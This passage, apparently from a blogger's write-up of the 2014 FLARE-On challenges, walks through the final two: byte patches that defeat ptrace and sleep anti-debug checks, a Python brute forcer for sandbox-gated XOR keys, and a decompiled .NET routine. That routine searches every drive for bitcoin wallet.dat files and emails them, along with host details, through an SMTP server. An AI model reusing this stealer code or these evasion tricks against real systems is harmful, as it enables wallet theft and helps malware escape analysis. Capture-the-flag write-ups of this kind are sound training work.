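To illustrate the mismatch, here is a tiny lookup sketch in Python 3 covering only a handful of calls. The numbers are taken from the standard Linux syscall tables for each architecture; the SYSCALLS dictionary and syscall_name helper are made up for this example and are nowhere near a complete table.

```python
# Partial tables only: a few well-known entries per architecture.
SYSCALLS = {
    "x86_64": {"read": 0, "write": 1, "nanosleep": 35, "exit": 60, "ptrace": 101},
    "i386": {"exit": 1, "read": 3, "write": 4, "ptrace": 26, "nanosleep": 162},
}

def syscall_name(arch, number):
    """Return the syscall name for a number, or None if it is not in this small table."""
    for name, num in SYSCALLS[arch].items():
        if num == number:
            return name
    return None

# The two values that matter for this sample, resolved as 64-bit syscalls.
print(syscall_name("x86_64", 101))
print(syscall_name("x86_64", 35))
```

Reading the value 101 or 35 against the 32-bit table would point at entirely different calls, which is the trap described above.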
The sample uses syscalls to throw a few wrenches at you. First, it makes a call to sys_ptrace to check for a debugger. It then later (after verifying the first arg) calls sys_nanosleep to enter deep sleeps before further execution.
The direct way around this was to just patch the bytes with a hex editor in the sample and reload the binary.
PATCH syscall 101 (ptrace?)
OLD: E8 9A 50 05 00 48 C1 E8 3F 84 C0 74 14
NEW: E8 9A 50 05 00 48 C1 E8 3F 84 C0 EB 14
PATCH syscall 35 (sleep?)
.text:0000000000473D49 B8 23 00 00 00 mov eax, 35 ; sys nanosleep
.text:0000000000473D4E 0F 05 syscall
OLD: B8 23 00 00 00 0F 05
NEW: 90 90 90 90 90 90 90
PATCH syscall 35 (sleep?)
.text:0000000000473D6A B8 23 00 00 00 mov eax, 35 ; sys nanosleep
.text:0000000000473D6F 0F 05 syscall
OLD: B8 23 00 00 00 0F 05
NEW: 90 90 90 90 90 90 90
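The same patches could be applied with a short script instead of a hex editor. The sketch below is in Python 3 and runs against a synthetic stand-in buffer, not the real sample; patch_bytes is a hypothetical helper, and the assumption that the nanosleep pattern occurs exactly twice in the real file is untested here. The first patch changes the conditional jump opcode 0x74 (JZ) to 0xEB (an unconditional short JMP), and the other two overwrite the syscall setup with NOPs.

```python
def patch_bytes(blob, old, new, expected_count=1):
    """Replace old with new, refusing to patch if the match count is a surprise."""
    if len(old) != len(new):
        raise ValueError("patch must keep the file the same size")
    found = blob.count(old)
    if found != expected_count:
        raise ValueError("expected %d match(es), found %d" % (expected_count, found))
    return blob.replace(old, new)

# Byte patterns copied from the patch notes above.
PTRACE_OLD = bytes.fromhex("E8 9A 50 05 00 48 C1 E8 3F 84 C0 74 14")
PTRACE_NEW = bytes.fromhex("E8 9A 50 05 00 48 C1 E8 3F 84 C0 EB 14")
SLEEP_OLD = bytes.fromhex("B8 23 00 00 00 0F 05")
SLEEP_NEW = b"\x90" * len(SLEEP_OLD)

# Synthetic buffer standing in for the ELF contents.
blob = b"\x00" * 4 + PTRACE_OLD + b"\xCC" + SLEEP_OLD + b"\xCC" + SLEEP_OLD
patched = patch_bytes(blob, PTRACE_OLD, PTRACE_NEW)
patched = patch_bytes(patched, SLEEP_OLD, SLEEP_NEW, expected_count=2)
print(patched.hex(" "))
```

On the real binary the blob would come from reading the file in binary mode, and the result would be written to a new file so the original stays untouched.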
After passing this check the sample returned up to the main function and went down a large rabbit hole of subroutines that all looked similar to the beginning. I stepped through most of it, trying to follow the flow of data. After a few dozen were called I noticed a block of what looked like Base64 data being written to memory. However, it was written out of sequence with large portions of null data mixed in.
Let me stop to mention that at this point many hours have gone by. I had started on Friday afternoon, and this is now Sunday evening. This sample took a lot of time to debug properly and required careful attention to where breakpoints should be placed. I neglected to do much of that, so there were many hours of wasted work. And there is a LOT of stepping to do.
It is now Monday. Eventually, I see an anonymous-looking subroutine call another, which called another, and another, all of which caused the program to stop if I stepped over them. At this point I was no longer following the data, but just hitting step until I saw interesting instructions... and then I saw call rdx. Too late, I had F8'd over it and the program stopped.
The day is growing long and I grow tired. I restarted and got to that point again and looked around. The large block of Base64 data was completed and was decoded in memory. The sample then called into that code for more instructions. Following this, I was disheartened to see the results. Over 30 individual encoding routines, each checking a respective character of command line arg2.
I quickly write up decoders for the first few in Python but then hit a limit with type casting in Python. C will let you do operations like (0x40 ^ 0xBB + 0xF1) and keep the result within a single byte. Python won't easily. Frustrated at the level of effort still ahead of me, I crash and go to bed.
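For what it's worth, the single-byte behavior can be emulated by masking each result down to 8 bits. A minimal sketch in Python 3, where u8 is an illustrative helper and ctypes.c_uint8 is shown as an alternative that truncates the same way:

```python
import ctypes

def u8(value):
    """Keep only the low 8 bits, as storing into an unsigned char would in C."""
    return value & 0xFF

# + binds tighter than ^ in both C and Python, so this is 0x40 ^ (0xBB + 0xF1).
raw = 0x40 ^ 0xBB + 0xF1
print(hex(raw))                         # wider than one byte
print(hex(u8(raw)))                     # truncated to a byte
print(hex(ctypes.c_uint8(raw).value))   # same truncation via ctypes
```

Wrapping every intermediate step of a decoder in u8() keeps additions and shifts from spilling past a byte.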
However, I instead lay in bed staring at the ceiling thinking this over, then quickly get up and run back to the basement. There was an incredibly easy way to do this! But... I didn't find it. I found a harder way, but still easier than re-writing each routine. Too tired to even spin up my VMs, I just ran Ollydbg from my host, tapped into random memory space, and hand-transcribed the operations in reverse:
Now THAT is ghetto reversing ...
Slowly the letters worked their way out and, at 00:26 on 29 July, I had the answer of l1nhax.hurt.u5.a1l@flare-on.com. Four and a half days of analysis ... I submit and crash in bed.
Challenge 7
This is it, the final challenge. I had two days left to wrap this up, and I quickly woke up to jump at it.
File Name       : a954bde7092791b06385a9617ba85415
File Size       : 195,584 bytes
MD5             : a954bde7092791b06385a9617ba85415
SHA1            : edb86bfa4d9272bac264dacc68ba1e8fa8878793
Fuzzy           : 3072:8biJ9nQgBfhfyBmr1UrjqvYdCVMi+z8HUrmv0UPBn/sNAc6n0OcGh6IVlo:8kQg7Amr1UfrCWZ881UPpsGY7GfP
Import Hash     : e1a627890bc24cc28061ac3baf4662fe
Compiled Time   : Sun Jul 06 22:05:19 2014 UTC
PE Sections (5) : Name    Size     MD5
                  .text   52,224   ab6c9a52eaf1b3b59c115abc63f1a80b
                  .rdata  12,800   40b19e50cb9c3dbc60d3c243823de929
                  .data   123,392  322a18069e4bc7af15c1f7c025a61bbc
                  .rsrc   512      c9363b5b6ba262c2acc3d14a8d930c07
                  .reloc  5,632    ced1665f50bf5ac984eb759ef096f05f
Magic           : PE32 executable for MS Windows (console) Intel 80386 32-bit
SignSrch        : offset    num   description [bits.endian.size]
                  00410af0  2545  anti-debug: IsDebuggerPresent [..17]
                  004321b4  3032  PADDINGXXPADDING [..16]
Nothing out of the ordinary. I open the sample expecting horrendous amounts of encoding... and was surprised. The malware reversed very easily; there was a limited number of subroutines, the code was clean, and everything made sense. The challenge was a bit more insidious.
Inside the executable is an encoded executable. You can see it. As the program runs it performs various checks against the system, such as "is the system 64bit?". If a check passes, it XOR decodes the data with one key. If it doesn't, it uses another key.
After a dozen checks, you have an executable that you can run. The problem is determining which code path will get you the final executable.
The obvious checks were eliminated: the "MZ" and "PE" bytes used other characters in the encoded file; you have to supply those on the command line. That took away the ability to simply search for 0x4d5a00. I went straight to work documenting all of the keys and routines and writing a brute forcer that would try every possible key combination against the executable until it produced a clean file. I'll admit that many of the checks were interesting, and mirrored the core connectivity/verification checks that malware likes to use:
There were slight differences in how many of the functions performed their XOR'ing. Some existed just to accommodate two keys in the same string. In the end they could've all been the same, but I tried to replicate them as I saw them, and wrote the following brute forcer:
# @bbaskin
import itertools

def x(data, key, keylen):
    newdata = ''
    for i in range(0, len(data)):
        newdata += chr( ord(data[i]) ^ ord(key[ i % keylen ]))
    return newdata

def x2(data, key, keylen):
    newdata = ''
    for i in range(0, len(data)):
        newdata += chr( ord(data[i]) ^ ord(key[ i & keylen ]))
    return newdata

def x3(data, key, num1, num2):
    newdata = ''
    for i in range(0, len(data)):
        newdata += chr( ord(data[i]) ^ ord(key[ (i & num1) + num2 ]))
    return newdata

def x4(data, key, num1, num2):
    newdata = ''
    for i in range(0, len(data)):
        newdata += chr( ord(data[i]) ^ ord(key[ (i % num1) + num2 ]))
    return newdata

def CheckPEB():
    global data
    if run[0]:
        data = x(data, "UNACCEPTABLE!", 13)
    else:
        data = x(data, "omglob", 6)

def CheckSIDT():
    global data
    if run[1]:
        data = x(data, "you're so bad", 13)
    else:
        data = x(data, "you're so good", 14)

def CheckVMXh():
    global data
    if run[2]:
        data = x(data, "\x01", 1)
    else:
        data = x(data, "f", 1)

def CheckLastError():
    global data
    if run[3]:
        data = x(data, "I'm gonna sandbox your face", 27)
    else:
        data = x(data, "Sandboxes are fun to play in", 28)

def CheckDebugger():
    global data
    if run[4]:
        data = x(data, "Such fire. Much burn. Wow.", 26)
    else:
        data = x(data, "I can haz decode?", 17)

def Check64Bit():
    global data
    if run[5]:
        data = x(data, "Feel the sting of the Monarch!", 30)
    else:
        data = x(data, "\x09\x00\x00\x01", 4)

def CheckFriday():
    global data
    if run[6]:
        data = x(data, "! 50 1337", 9)
    else:
        data = x2(data, "1337", 3)

def CheckFNBackDoge():
    global data
    if run[7]:
        data = x(data, "MATH IS HARDLETS GO SHOPPING", 12)
    else:
        data = x3(data, "MATH IS HARDLETS GO SHOPPING", 15, 12)

def CheckInternetAccess():
    global data
    if run[8]:
        data = x2(data, "SHOPPING IS HARDLETS GO MATH", 15)
    else:
        data = x4(data, "SHOPPING IS HARDLETS GO MATH", 12, 16)

def Check5PM():
    global data
    if run[9]:
        data = x2(data, "\x07w", 1)
    else:
        data = x(data, "\x01\x02\x03\x05\x00\x78\x30\x38\x0D", 9)

def CheckDNSROOT():
    global data
    if run[10]:
        IP = "192.203.230.10"
        newdata = ''
        for i in range(0, len(data)):
            pos = i % len(IP)
            newdata += chr( ord(data[i]) ^ ord(IP[pos]) )
        data = newdata

def CheckTwitter():
    global data
    if run[11]:
        data = x(data, "jackRAT", 7)

def CheckDebugger2():
    global data
    if run[12]:
        data = x(data, "the final countdown", 19)
    else:
        data = x(data, "oh happy dayz", 13)

def XorPath():
    global data
    path = "backdoge.exe"
    data = x(data, path, 12)

def main():
    global data
    global run
    CheckPEB()
    CheckSIDT()
    CheckVMXh()
    CheckLastError()
    CheckDebugger()
    Check64Bit()
    CheckFriday()
    CheckFNBackDoge()
    CheckInternetAccess()
    Check5PM()
    CheckDNSROOT()
    CheckTwitter()
    CheckDebugger2()
    XorPath()

if __name__ == "__main__":
    global data
    global run
    fh = open('backdoge.exe', 'rb')
    fh.seek(0x113f8)
    data_back = fh.read(118272)
    fh.close()
    for run in itertools.product(range(2), repeat=13):
        fn = "E:\\Malware\\FLARE\\7\\out\\"
        for z in itertools.product(*[run]):
            fn += str(z[0])
        data = data_back
        main()
        if data[2] == "\x90" and data[3] == "\x00" and data[5] == "\x00" and data[6] == "\x00":
            print run, data[0:12].encode('hex')
            open(fn, 'wb').write(data)
It's not great code, and not fast, but it worked. Eventually. I wasted an entire day of effort on this because I mis-numbered the offsets and so was not getting any positive results. This caused me to go extremely in depth with the script, only to learn my mistake the next day. <face palm>
After a few minutes of (successful) running, the script flagged a hit:
E:\malware\FLARE\7>7_bruteforce.py
(0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1) feeb9000030000000400050e
After applying the "MZ" and "PE", it became a legitimate executable!
File Name : gratz.exe
File Size : 118,272 bytes
MD5 : 4f2b4cc03199553ff39d7e214a4ee8c6
SHA1 : 2a6fc52764451e8d937f2dc0464aa0ba809031f4
Fuzzy : 3072:Bt9rJyNXrCJsq18PG/i9SICdn8rMA+GJJLOFiUF1hSBSi/NgXf5wq:b9rJgbI8P597rMryL2nFiBSAePq
Import Hash : f34d5f2d4577ed6d9ceec516c1f5a744
Compiled Time : Sat Jul 05 22:58:43 2014 UTC
PE Sections (3) : Name Size MD5
.text 115,712 9c7b5b112287933a9dd532548895a3ac
.rsrc 1,536 b34dc44cc95a966d8d2df8a209f2ecf1
.reloc 512 aaa13a058c9ceffaaf68b401a847b37c
Magic : PE32 executable for MS Windows (GUI) Intel 80386 32-bit Mono/.Net assembly
.NET Version : 2.0.0.0
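The "MZ"/"PE" fix-up mentioned above can be sketched in a few lines of Python 3. This is an illustration rather than the exact steps I took: the function name restore_pe_magic is invented, and the sketch assumes that only the two 2-byte markers are wrong and that the rest of the DOS header, including the e_lfanew field at offset 0x3C, decoded correctly.

```python
import struct

E_LFANEW_OFFSET = 0x3C  # DOS header field holding the file offset of the PE header


def restore_pe_magic(image):
    """Return a copy of image with the 'MZ' and 'PE' markers written back.

    Assumption: everything except the two markers is already correct,
    so e_lfanew can be trusted to locate the PE signature.
    """
    buf = bytearray(image)
    buf[0:2] = b"MZ"
    (pe_offset,) = struct.unpack_from("<I", buf, E_LFANEW_OFFSET)
    if pe_offset + 2 > len(buf):
        raise ValueError("e_lfanew points outside the buffer")
    buf[pe_offset:pe_offset + 2] = b"PE"
    return bytes(buf)
```

Calling it on the bytes of a brute-forced candidate and writing the result back out gives a file that PE tools should recognize, provided the assumption about e_lfanew holds.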
First, I execute it to see what happens:
I had seen this guy being spread around Twitter by others finishing up, so I knew I was close. Seeing the .NET 2.0 here, I load the sample up in .NET Reflector for analysis.
The main Form1 function contains no overtly weird data for this form. There are no hidden buttons, but not all labels are accounted for in the output. There are seven labels (numbered 1-8, with 7 missing) and all are displayed except Label2, whose text never appears on the form.
Let's start from the beginning and monitor the form creation. The form starts a new thread to call a routine called lulzors:
This routine sets Label2.text, the missing equation, by sending obfuscated data to lulz.decoder4. I use Reflector to browse to the lulz module and see a few bits of obfuscation:
public class lulz
{
    public void datwork()
    {
        object obj2 = ((("" + this.decoder1("(\x0014\x0018Z.\x0010\r\x0019\x0003\x001bVpAXAWAXAWAXAWAXAWAXAWAXAWAXAWAXAWAXAp")) + this.decoder2("9\t\n\x001b\x001d\x0006\fIT") + Environment.MachineName + "\n") + this.decoder3("&\x001a\t\x001e=\x001c\x0004\r\x0005\x0017II") + Environment.UserDomainName + "\n") + this.decoder1("9\x0006\t\bVU") + Environment.UserName + "\n";
        string info = string.Concat(new object[] { obj2, this.decoder2(";;I%\x0011\x001a\x001a\x001a\x001b\x0006SS"), Environment.OSVersion, "\n" });
        foreach (string str2 in Environment.GetLogicalDrives())
        {
            info = info + this.decoder3("7\x001b\x0005\x001a\x001cII") + str2 + "\n";
            this.yum(str2, this.decoder1("\x001b\x0014\0\x0016\t\x0001B\x001e\r\x0001"), ref info);
        }
        string str3 = "";
        foreach (IPAddress address in Dns.GetHostEntry(Dns.GetHostName()).AddressList)
        {
            if (address.AddressFamily == AddressFamily.InterNetwork)
            {
                str3 = address.ToString();
                break;
            }
        }
        info = info + this.decoder3(":9VL") + str3 + "\n\n";
        MailMessage message = new MailMessage();
        message.To.Add(this.decoder2("\x0015\x0004X]\x0010\t\x001d]\x0010\t\x001d\x00124\x000e\x0005\x0012\x0006\rD\x001c\x001aF\n\x001c\x0019"));
        message.Subject = this.decoder3(":N\x0001L\x0018S\n\x0003\x0001\t\x0006\x001d\t\x001e");
        message.From = new MailAddress(this.decoder1("\0\0\0\0,\x0013\0\x001b\x001e\x0010A\x0015\x0002[\x000f\x0015\x0001"));
        message.Body = info;
        new SmtpClient(this.decoder2("\a\x0005\x001d\x0003Z\x001b\f\x0010\x0001\x001a\f\0\x0011\x001a\x001f\x0016\x0006F\a\x0016\0")).Send(message);
    }

    public string decoder1(string encoded)
    {
        string str = "";
        string str2 = "lulz";
        for (int i = 0; i < encoded.Length; i++)
        {
            str = str + ((char) (encoded[i] ^ str2[i % str2.Length]));
        }
        return str;
    }

    public string decoder2(string encoded)
    {
        string str = "";
        string str2 = "this";
        for (int i = 0; i < encoded.Length; i++)
        {
            str = str + ((char) (encoded[i] ^ str2[i % str2.Length]));
        }
        return str;
    }

    public string decoder3(string encoded)
    {
        string str = "";
        string str2 = "silly";
        for (int i = 0; i < encoded.Length; i++)
        {
            str = str + ((char) (encoded[i] ^ str2[i % str2.Length]));
        }
        return str;
    }

    public string decoder4(string encoded)
    {
        string str = "";
        string str2 = this.decoder2("\x001b\x0005\x000eS\x001d\x001bI\a\x001c\x0001\x001aS\0\0\fS\x0006\r\b\x001fT\a\a\x0016K");
        for (int i = 0; i < encoded.Length; i++)
        {
            str = str + ((char) (encoded[i] ^ str2[i % str2.Length]));
        }
        return str;
    }

    public void yum(string folder, string name, ref string info)
    {
        try
        {
            foreach (string str in Directory.GetFiles(folder))
            {
                if (str.EndsWith(name))
                {
                    byte[] inArray = File.ReadAllBytes(str);
                    info = info + this.decoder3("=\x0006\x0001\x001fCS") + str + "\n";
                    info = info + Convert.ToBase64String(inArray) + "\n";
                }
            }
            foreach (string str2 in Directory.GetDirectories(folder))
            {
                this.yum(str2, name, ref info);
            }
        }
        catch (Exception exception)
        {
            Console.WriteLine(exception.Message);
        }
    }
}
The first thing I noticed was the creation of an email in datwork(), where obfuscated fields are used to create the recipient, subject, and body. We'll come back to that.
There are multiple "decoder" functions, each simply doing multi-byte XOR against static strings: lulz, this, silly, and an obfuscated value that resolves to "omg is this the real one?". I recreated each in Python, decoded the values, and replaced them back into the source:
public class lulz
{
    public void datwork()
    {
        object obj2 = (("Dat Beacon:\n-----------------------------------\n" + "Machine: " + Environment.MachineName + "\n") + "UserDomain:" + Environment.UserDomainName + "\n") + "User: " + Environment.UserName + "\n";
        string info = string.Concat(new object[] { obj2, "OS Version: ", Environment.OSVersion, "\n" });
        foreach (string str2 in Environment.GetLogicalDrives())
        {
            info = info + "Drive: " + str2 + "\n";
            this.yum(str2, "wallet.dat", ref info);
        }
        string str3 = "";
        foreach (IPAddress address in Dns.GetHostEntry(Dns.GetHostName()).AddressList)
        {
            if (address.AddressFamily == AddressFamily.InterNetwork)
            {
                str3 = address.ToString();
                break;
            }
        }
        info = info + "IP: " + str3 + "\n\n";
        MailMessage message = new MailMessage();
        message.To.Add("al1.dat.data@flare-on.com");
        message.Subject = "I'm a computer";
        message.From = new MailAddress("lulz@flare-on.com");
        message.Body = info;
        new SmtpClient("smtp.secureserver.net").Send(message);
    }

    public void yum(string folder, string name, ref string info)
    {
        try
        {
            foreach (string str in Directory.GetFiles(folder))
            {
                if (str.EndsWith(name))
                {
                    byte[] inArray = File.ReadAllBytes(str);
                    info = info + "Noms: " + str + "\n";
                    info = info + Convert.ToBase64String(inArray) + "\n";
                }
            }
            foreach (string str2 in Directory.GetDirectories(folder))
            {
                this.yum(str2, name, ref info);
            }
        }
        catch (Exception exception)
        {
            Console.WriteLine(exception.Message);
        }
    }
}
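All four decoder routines are the same repeating-key XOR, so one helper covers them. Below is a minimal Python 3 sketch of that recreation, not the original script: the name xor_decode is invented, and the C# \xNNNN escapes from the Reflector output have been rewritten by hand as two-digit Python escapes.

```python
def xor_decode(encoded, key):
    """XOR each character of encoded against key, repeating the key as needed."""
    return "".join(
        chr(ord(ch) ^ ord(key[i % len(key)])) for i, ch in enumerate(encoded)
    )


# Static keys used by decoder1, decoder2 and decoder3.
KEY1, KEY2, KEY3 = "lulz", "this", "silly"

# decoder4 builds its key by running this blob through decoder2.
KEY4_BLOB = (
    "\x1b\x05\x0eS\x1d\x1bI\x07\x1c\x01\x1aS\x00\x00\x0cS"
    "\x06\x0d\x08\x1fT\x07\x07\x16K"
)
KEY4 = xor_decode(KEY4_BLOB, KEY2)

if __name__ == "__main__":
    print(KEY4)                                  # omg is this the real one?
    print(xor_decode("9\x06\t\x08VU", KEY1))     # "User: " label from datwork()
    print(xor_decode("7\x1b\x05\x1a\x1cII", KEY3))  # "Drive: " label
```

Because XOR is its own inverse, the same helper also re-encodes a plaintext string, which is handy for sanity-checking a transcription.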
Let me just say ... WTF?! This routine will build basic data about your system to email out but, more specifically, search all of your local hard drives for a bitcoin wallet. If found, the contents will be copied and emailed to FireEye. Maybe it's just to highlight the importance of running within a VM, or without Internet access, but ...
Anyhow, this is all secondary to the purpose of the file, to get the email. And that "al1.dat.data@flare-on.com" is not the correct one. Instead, we need to go back to the form and find the data being sent into decoder4(). Resolving it gives:
That sounds like it! Beaten, and exhausted, I shoot the final email off at 1750 on 31 July, with just over an hour before my personal deadline. Two and a half days were spent on this last challenge. I receive my confirmation two minutes later and go open a bottle of whisky.
After a few days I received a follow-up email asking how I completed the last few challenges, which I replied to, and then received my award on 20 September, an RMO designating my finish order (0x83 or 131):
Thanks to FireEye and the FLARE team for a fun challenge! I had a lot of fun and constructive frustration in solving them. We all knew this was a recruitment drive, but it was still fun :)
Thank you for reading, and I hope this helps anyone else in the field!